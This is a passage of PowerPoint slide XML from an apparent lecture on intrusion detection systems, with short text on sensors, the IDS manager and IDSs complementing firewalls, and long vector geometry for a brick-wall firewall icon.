            <a:off x="518769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IDS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90AC3F3-638F-C929-D232-97A1BDD18835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217846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CB86005-D17D-4181-5AFF-E883E869ED97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217846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115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270C4A8-D7AD-134E-EAB7-2C1DA33745DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531407" y="1581150"/>
            <a:ext cx="8107680" cy="273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Detection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performed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multitude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sensors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,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software</a:t>
            </a:r>
            <a:endParaRPr sz="2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components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400" spc="-1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inspect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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400" spc="-1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traffic.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Sensors</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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passively</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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intercept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intrusions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1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communicate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them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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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manager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,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software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charge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maintaining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policies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which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provides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management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console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system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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administrator.</a:t>
            </a:r>
            <a:endParaRPr sz="24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150690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90153AC-0B38-904D-CDAC-898099177208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045E318-6F11-23C1-052E-285E3A9F57B5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IDS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E7C3AED-171E-E906-206F-49D25F120B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1410019"/>
            <a:ext cx="7060565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IDSs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do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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4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substitute</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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firewalls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They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support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firewalls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providing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further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of security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protecting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endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2315210">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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mainstream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well-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known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attack vectors.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F85CC609-3F08-8AC7-63AD-4680640013DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5989155" y="2649589"/>
            <a:ext cx="1667255" cy="2052827"/>
            <a:chOff x="5867400" y="2648711"/>
            <a:chExt cx="1667255" cy="2052827"/>
          </a:xfrm>
        </p:grpSpPr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E535C735-DAC3-74A8-CE37-2FB672A3DB2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2648711"/>
              <a:ext cx="1667255" cy="205282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0940B3F7-00CA-723A-4DDD-A83062C9CF2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6436369" y="2969221"/>
              <a:ext cx="903605" cy="1551305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="903604" h="1551304">
                  <a:moveTo>
                    <a:pt x="899716" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="147642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="1551236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903028" y="1403581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899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073B2B13-DC8C-D71E-93B9-17389976EF6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6274819" y="3074781"/>
              <a:ext cx="167005" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="167004" h="182245">
                  <a:moveTo>
                    <a:pt x="166737" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166737" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166737" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7382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D67F4580-26CE-CCB1-13CD-48BD7C1E1D4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6438154" y="3084901"/>
              <a:ext cx="334645" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334645" h="161925">
                  <a:moveTo>
                    <a:pt x="334608" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="161915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334608" y="161915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334608" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF412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03E6AF4-1AF9-BD06-C67B-67167CEB63F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7118714" y="2955593"/>
              <a:ext cx="334010" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334009" h="174625">
                  <a:moveTo>
                    <a:pt x="333474" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="174283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="119187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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404B734F-1966-24D1-0295-92CFF58A63FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3011817"/>
              <a:ext cx="1015365" cy="770255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="770254">
                  <a:moveTo>
                    <a:pt x="333476" y="588073"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="651040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="770229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333476" y="715124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333476" y="588073"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="770254">
                  <a:moveTo>
                    <a:pt x="673760" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325539" y="62966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332346" y="182156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673760" y="125933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673760" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="770254">
                  <a:moveTo>
                    <a:pt x="1015174" y="468884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="681697" y="523976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681697" y="651040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="586943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="468884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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935E4662-F3F0-831F-BF3A-55961C1B435B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6778434" y="3543661"/>
              <a:ext cx="332740" cy="175895"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="332740" h="175895">
                  <a:moveTo>
                    <a:pt x="332340" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332340" y="119187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332340" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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60E815BB-4DC6-14C0-214D-1411C22BDA5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437020" y="3337893"/>
              <a:ext cx="334010" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334009" h="182245">
                  <a:moveTo>
                    <a:pt x="333474" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="118063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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81E21D74-845D-BB2F-3CC7-B931D3AE0BC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7118714" y="3217581"/>
              <a:ext cx="334010" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334009" h="182245">
                  <a:moveTo>
                    <a:pt x="333474" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="119187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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F6B34BC0-DE0D-3474-85F9-E842EAB09DA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3082658"/>
              <a:ext cx="1015365" cy="373380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="373379">
                  <a:moveTo>
                    <a:pt x="158800" y="151790"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="183273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="302463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="277736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="151790"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="373379">
                  <a:moveTo>
                    <a:pt x="673760" y="191147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="341426" y="254114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341426" y="373303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673760" y="318211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673760" y="191147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="373379">
                  <a:moveTo>
                    <a:pt x="1015174" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="856373" y="31483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856373" y="151790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="127063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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0A49277-5182-E600-396D-2933B1DDD51B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3115271"/>
              <a:ext cx="1015365" cy="532130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="158800" y="381165"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="412648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="531837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="507111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="381165"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="499084" y="324954"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="174688" y="380047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174688" y="507111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="444131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="324954"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="499084" y="62966"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="174688" y="118059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174688" y="237248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="182143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="62966"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="840498" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="514959" y="55092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514959" y="182143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840498" y="118059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840498" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="1015174" y="230505"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="856373" y="261988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856373" y="381165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="356438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="230505"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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E0E31C10-8763-17FB-E8B9-BFF4A86CB65D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6951977" y="3377248"/>
              <a:ext cx="325755" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="325754" h="182245">
                  <a:moveTo>
                    <a:pt x="325534" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="62967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325534" y="127058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325534" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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5D2E42FE-762E-8050-FD9F-49A60AACF440}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3742689"/>
              <a:ext cx="1015365" cy="301625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="301625">
                  <a:moveTo>
                    <a:pt x="333476" y="119189"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="182156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="301345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333476" y="246240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333476" y="119189"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="301625">
                  <a:moveTo>
                    <a:pt x="1015174" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="681697" y="62966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681697" y="182156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="127063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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8545E6B-6C0B-E930-8F2B-0AE0B7597B75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437020" y="3806774"/>
              <a:ext cx="1015365" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="762635">
                  <a:moveTo>
                    <a:pt x="333463" y="588073"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="643166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333463" y="707263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333463" y="588073"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="762635">
                  <a:moveTo>
                    <a:pt x="673747" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="341414" y="55105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341414" y="174294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673747" y="118071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673747" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="762635">
                  <a:moveTo>
                    <a:pt x="1015161" y="461010"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="681685" y="523976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681685" y="643166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015161" y="586943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015161" y="461010"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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FC527389-0237-7003-1AB7-ABB283F0D2FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6778434" y="4330750"/>
              <a:ext cx="332740" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="332740" h="182245">
                  <a:moveTo>
                    <a:pt x="332340" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332340" y="119187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332340" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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1489F286-5CE7-A03B-1E07-9F3C61B216BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437020" y="4124982"/>
              <a:ext cx="334010" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334009" h="182245">
                  <a:moveTo>
                    <a:pt x="333474" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="62967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="125934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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9B728112-9172-BB76-17F1-F9B51CDB01A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7118715" y="4005794"/>
              <a:ext cx="334010" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334009" h="182245">
                  <a:moveTo>
                    <a:pt x="333474" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="62967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="125934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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5D4EB36F-BFCD-1158-9FE7-FE502F13546C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3877614"/>
              <a:ext cx="1015365" cy="373380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="373379">
                  <a:moveTo>
                    <a:pt x="158800" y="151803"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="175412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="302475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="269862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="151803"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="373379">
                  <a:moveTo>
                    <a:pt x="673760" y="191147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="341426" y="246253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341426" y="373303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673760" y="310337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673760" y="191147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="373379">
                  <a:moveTo>
                    <a:pt x="1015174" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="856373" y="23622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856373" y="151803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="119189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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BDD32986-47FB-C091-3634-C6B39F1A8266}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3615626"/>
              <a:ext cx="1015365" cy="532130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="158800" y="150672"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="174282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="293471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="268732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="150672"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="499084" y="349694"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="174688" y="404787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174688" y="531850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="468884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="349694"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="840498" y="293471"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="514959" y="348576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514959" y="467753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840498" y="412661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840498" y="293471"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="532129">
                  <a:moveTo>
                    <a:pt x="1015174" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="856373" y="23622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856373" y="150672"/>
                  </a:lnTo>
